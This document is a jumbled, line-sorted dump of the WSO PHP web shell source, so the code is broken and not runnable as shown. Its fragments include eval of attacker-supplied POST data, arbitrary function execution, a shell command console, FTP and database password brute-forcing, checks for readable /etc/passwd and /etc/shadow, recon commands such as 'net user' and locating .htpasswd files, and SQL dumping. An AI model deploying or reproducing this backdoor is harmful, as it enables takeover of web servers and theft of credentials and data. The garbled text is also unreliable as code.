#toolsTbl{ text-align:center; } $aliases = array( $auth_pass = "d4925075161268216fbd1dc779d2036c"; $c = @file_get_contents($_POST['p1']); $charsets = array('UTF-8' $color = "#df5"; $columns = array(); $columns[] = "`".$k."`"; $columns[] = $k; $cwd .= '/'; $cwd = @getcwd(); $cwd = str_replace("\\" $danger = array('kav' $db = new DbClass($_POST['type']); $db->connect($_POST['sql_host'] $db->dump($v $db->dump($v); $db->listDbs(); $db->selectdb($_POST['sql_base']); $default_action = 'FilesMan'; $default_charset = 'Windows-1251'; $default_use_ajax = true; $dh = opendir($path); $dirs[] = array_merge($tmp $disable_functions = @ini_get('disable_functions'); $downloaders = array('wget' $explink = 'http://exploit-db.com/search/?action=search&filter_description='; $files = array_merge($dirs $files[] = $filename; $fp = @fopen($_POST['p1'] $freeSpace = @diskfreespace($GLOBALS['cwd']); $gid['name'] = @filegroup($_POST['p1']); $GLOBALS['cwd'] = @getcwd(); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $h = @opendir($c.$s); $h = array('00000000<br>' $head = true; $home_cwd = @getcwd(); $home_cwd = str_replace("\\" $host = explode(':' $h[1] .= '<br>'; $h[1] .= sprintf('%02X' $h[2] .= "\n"; $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0100) ? 'r' : '-'); $item = $path.$item; $item[$k] = "'".@mysql_real_escape_string($v)."'"; $item[$k] = "'".addslashes($v)."'"; $item[$k] = "NULL"; $item[$k] = $v; $kernel = @php_uname('s'); $l = 0; $len = strlen($c); $line = trim($line); $n = 0; $n++; $opt_charsets = ''; $os = 'nix'; $out = ob_get_clean(); $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $path = (substr($path $path = wsoEx('which ' . $p); $release = @php_uname('r'); $res = func_num_args()?func_get_arg(0):$this->res; $r[] = $i['file']; $safe_mode = @ini_get('safe_mode'); $sql .= 'INSERT INTO `'.$table.'` ('.implode(" $sql = 'INSERT INTO '.$table.' ('.implode(" $success++; $temp .= join(':' $temp = ""; $temp = @file($_POST['dict']); $temp = @iconv($_POST['charset'] $temp=array(); $temp[] = "MSSQL"; $temp[] = "MySql (".mysql_get_client_info().")"; $temp[] = "Oracle"; $temp[] = "PostgreSQL"; $temp[] = $item; $this->query('drop table wso2'); $this->query('SELECT * FROM '.$table); $this->query('SET CHARSET '.$str); $time = strtotime($_POST['p3']); $title = false; $tmp .= $line[0][$i]; $tmp = array('name' => $dirContent[$i] $totalSpace = $totalSpace?$totalSpace:1; $totalSpace = @disk_total_space($GLOBALS['cwd']); $uid = @posix_getpwuid($_POST['p2']); $uid = @posix_getpwuid(@fileowner($_POST['p1'])); $uid['name'] = @fileowner($_POST['p1']); $userAgents = array("Google" $userful = array('gcc' $v = trim($v); $value = htmlspecialchars($value); $zip = new ZipArchive(); $zip->addFile($_COOKIE['c'].$f $zip->close(); $zip->extractTo($GLOBALS['cwd']); $_COOKIE = WSOstripslashes($_COOKIE); $_COOKIE['f'] = array_map('escapeshellarg' $_POST = WSOstripslashes($_POST); $_POST['p2'] = "edit"; $_POST['p3'] = substr($_POST['p3'] '' 'Htmlspecialchars' => 'htmlspecialchars' 'modify' => date('Y-m-d H:i:s' 'path' => $GLOBALS['cwd'].$dirContent[$i] 'String length' => 'strlen' 'String to lower case' => 'strtolower' 'String to upper case' => 'strtoupper' ) ); ++$attempts; .bigarea{ width:100%;height:300px; } .l1{background-color:#444} .l2{background-color:#333} .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .toolsInp{ width: 300px } </form>"; </script> </script>"; </style> </tr><tr> <form method='post' target='_blank' name='hf'> <form method=post name=mf style='display:none;'> <form name='nfp' onSubmit=\"g(null <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <form onsubmit=\"g(null <h1>Sql browser</h1><div class=content> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <input type='hidden' name='act' value='find'/> <input type='text' name='hash' style='width:200px;'><br> <input type=hidden name=a value='FilesMan'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=charset> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <script> <td><form onsubmit=\"g('FilesTools' <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> @chdir($_POST['c']); @copy($c.$s @define('WSO_VERSION' @fclose($fp); @fwrite($fp @ini_set('error_log' @ini_set('log_errors' @ini_set('max_execution_time' @rename($_COOKIE['c'].$f @set_magic_quotes_runtime(0); @set_time_limit(0); @touch($_POST['p1'] @unlink($f); ARP Table => "arp -a" break; case "cp866": $db->setCharset('cp866'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "UTF-8": $db->setCharset('utf8'); break; case "Windows-1251": $db->setCharset('cp1251'); break; case 'delete': case 'hexdump': case 'highlight': case 'mysql': case 'paste': case 'pgsql': case 'touch': case 0: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; chdir($GLOBALS['cwd']); chdir($_COOKIE['c']); clearstatcache(); cmds.pop(); cmds.push(''); cmds.push(cmd); continue; copy_paste($c.$s.'/' copy_paste($_COOKIE['c'] cur = cmds.length-1; cur++; cur--; d.mf.submit(); d.sf.p1.value = 'select'; d.sf.p2.value = t; d.sf.submit(); default: $h[2] .= $c[$i]; break; die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); die('Shell has been removed'); document.cf.cmd.value = cmds[cur]; echo " echo "</div><br><h1>Search for hash:</h1><div class=content> echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; echo "<script> echo "<select name=sql_base><option value=''></option>"; echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; echo "c_='".$GLOBALS['cwd']."';"; echo "d.cf.cmd.value='';\n"; echo "d.cf.output.value+='".$temp."';"; echo $v . '<br>'; echo $_POST['p1']($_POST['p2']); echo '</div>'; echo '</textarea><input type=submit value=">>"></form>'; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; echo '<br/>'; echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null echo '<br>'; echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; echo '<form onsubmit="g(null echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; echo '<h1>File tools</h1><div class=content>'; echo '<h1>Server security information</h1><div class=content>'; echo '<pre class=ml1>' . $v . '</pre>'; echo '<script>p3_="";</script><form onsubmit="g(null echo '<span>' . $n . ': </span>'; echo 'Fail!'; echo 'File not exists'; echo 'Saved!<br><script>p3_="";</script>'; echo 'Touched!'; echo 'unlink error!'; echo @fread($fp echo htmlspecialchars(@fread($fp echo strlen($temp) echo"</pre></div><br><h1>Search files:</h1><div class=content> else else $i = 'u'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif($s >= 1024) elseif($s >= 1048576) elseif(@is_dir($_COOKIE['c'].$f)) { elseif(is_int($v)) error_reporting(0); eval($_POST['p1']); eval(arr[2].substr(0 exit; fclose($fp); Find *config*.php in current dir => "dir /s /w /b *config*.php" for ($i=0; $i<$len; ++$i) { for($i=0;$i<$n;$i++) { for($i=strlen($line[0])-1; $i>=0; --$i) for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { for(i=0;i<d.mf.elements.length;i++) for(i=0;i<d.sf.elements['tbl[]'].length;++i) foreach ($danger as $item) foreach ($downloaders as $item) foreach ($userful as $item) foreach($charsets as $item) foreach($files as $f) { foreach($item as $k=>$v) { foreach($temp as $line) { foreach($_COOKIE['f'] as $f) foreach($_COOKIE['f'] as $f) { foreach($_POST['tbl'] as $v) form{ margin:0px; } function a(a function actionConsole() { function actionNetwork() { function actionPhp() { function actionSecInfo() { function actionStringTools() { function add(cmd) { function connect($host function copy_paste($c function deleteDir($path) { function dump($table function fetch() { function g(a function is() { function kp(e) { function listDbs() { function loadFile($str) { function move_paste($c function processReqChange() { function setCharset($str) { function st(t function wsoBruteForce($ip function wsoLogin() { function wsoPerms($p) { function wsoSecParam($n function WSOstripslashes($array) { function wsoViewSize($s) { function wsoWhich($p) { GLOBO GOOGLE header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); header('HTTP/1.0 404 Not Found'); Ibanez if ($i+1 < $len) {$h[0] .= sprintf('%08X' if ($n == 32) { if ($uid) if ($zip->open($_POST['p2'] if (($f != ".") and ($f != "..")) if (($p & 0xC000) == 0xC000)$i = 's'; if (isset ($_POST['p2'] if( !empty($_POST['p3']) ) { if( !file_exists(@$_POST['p1']) ) { if( $this->link = @mysql_connect($host if( (req.readyState == 4) ) if( @$_POST['p2'] == 'mkfile' ) { if( @is_readable($_POST['p1']) ) { if( empty($_POST['a']) ) if( is_array($temp) ) if( wsoBruteForce($server[0] if( wsoBruteForce(@$server[0] if(!$GLOBALS['safe_mode']) { if(!$host[1]) $host[1]=5432; if(!$safe_mode) if(!$uid) { if(!empty($path)) if(!empty($_POST['p1']) && !empty($_POST['p2'])) { if(!empty($_POST['p1'])) { if(!empty($_SERVER['HTTP_USER_AGENT'])) { if(!file_exists($_POST['p1'])) { if(!touch($_POST['p1'] if($cwd[strlen($cwd)-1] != '/') if($db->res !== false) { if($f == '..') if($fp) fwrite($fp if($fp) { if($GLOBALS['os'] == 'nix') { if($head) { if($os == 'win') { if($s >= 1073741824) if($time) { if($v == '') { if($v === null) if($v) { if($zip->open($_COOKIE['c'].$f)) { if($_COOKIE['act'] == 'copy') { if($_POST['p1'] != 'yes') if(@$_POST['p2']=='download') { if(@chdir($match[1])) { if(@is_file($_COOKIE['c'].$f)) if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; if(class_exists('ZipArchive')) { if(cur < cmds.length) if(cur>=0) if(empty($_POST['ajax'])&&!empty($_POST['p1'])) if(empty($_POST['file'])) { if(f.p2) f.p2.value=''; if(f.p3) f.p3.value=''; if(function_exists('apache_get_modules')) if(function_exists('mssql_connect')) if(function_exists('mysql_get_client_info')) if(function_exists('mysql_set_charset')) if(function_exists('oci_connect')) if(function_exists('pg_connect')) if(get_magic_quotes_gpc()) { if(in_array($_POST['p1'] if(isset($_POST['ajax'])) { if(isset($_POST['c'])) if(is_dir($c.$s)){ if(l && d.sf.p3) d.sf.p3.value = l; if(n == 38) { if(preg_match("!.*cd\s+([^;]+)$!" if(preg_match('/' . implode('|' if(req.status == 200) { if(strpos($v if(strpos('Linux' if(wsoWhich($item)) input INTEL IP Configuration => "ipconfig /all" IPHONE List dir => "ls -lha" list($key locate .htpasswd files => "locate '.htpasswd'" MICROSOFT mkdir($d.$s); ob_start("ob_gzhandler" ob_start(); pre{font-family:Courier return $files; return $out; return $path; return $res; return $s . ' B'; return $this->query("SHOW databases"); return $this->res = @mysql_query($str); return $this->res = @pg_query($this->link return @mysql_fetch_assoc($res); return @mysql_set_charset($str return @pg_fetch_assoc($res); return @pg_set_client_encoding($this->link return array('file'=>implode("\n" return false; return sprintf('%1.2f' return; set(a Show active connections => "netstat -an" Show computers => "net view" Show running services => "net start" sleep(1); switch ( ord($c[$i]) ) { switch($this->type) { switch($_POST['charset']) { TESTE1 TESTE2 unset($_POST['p2']); User accounts => "net user" usort($dirs usort($files var arr=reg.exec(req.responseText); var n = (window.Event) ? e.which : e.keyCode; var params = 'ajax=true'; var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\" while ( ($item = readdir($dh) ) !== false) { while (($f = @readdir($h)) !== false) while (false !== ($filename = readdir($dh))) while( !@feof($fp) ) while(!@feof($fp)) while($i=$this->fetch()) while($item = $db->fetch()) { while($item = $this->fetch()) { wsoFooter(); wsoHeader(); wsoRecursiveGlob($_POST['c']); wsoSecParam('Account Settings' wsoSecParam('cURL support' wsoSecParam('Danger' wsoSecParam('Disabled PHP Functions' wsoSecParam('Distr name' wsoSecParam('Downloaders' wsoSecParam('HDD space' wsoSecParam('Hosts' wsoSecParam('Loaded Apache modules' wsoSecParam('Open base dir' wsoSecParam('OS version' wsoSecParam('Readable /etc/passwd' wsoSecParam('Readable /etc/shadow' wsoSecParam('Safe mode exec dir' wsoSecParam('Safe mode include dir' wsoSecParam('Server software' wsoSecParam('Supported databases' wsoSecParam('User Accounts' wsoSecParam('Userful' wsoSecParam('Users' WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax' WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax' } } else } else alert('Request error!'); } else echo 'Bad time format!'; } else if(n == 40) { } else { } elseif( $_POST['proto'] == 'pgsql' ) { } elseif($fp = @fopen($_POST['file'] } elseif($_COOKIE['act'] == 'move') { } elseif($_COOKIE['act'] == 'tar') { } elseif($_COOKIE['act'] == 'unzip') { } elseif($_COOKIE['act'] == 'zip') { } elseif($_POST['type'] == 2) { } elseif(@is_file($c.$s)) } elseif(is_file($c.$s)) }; }exit;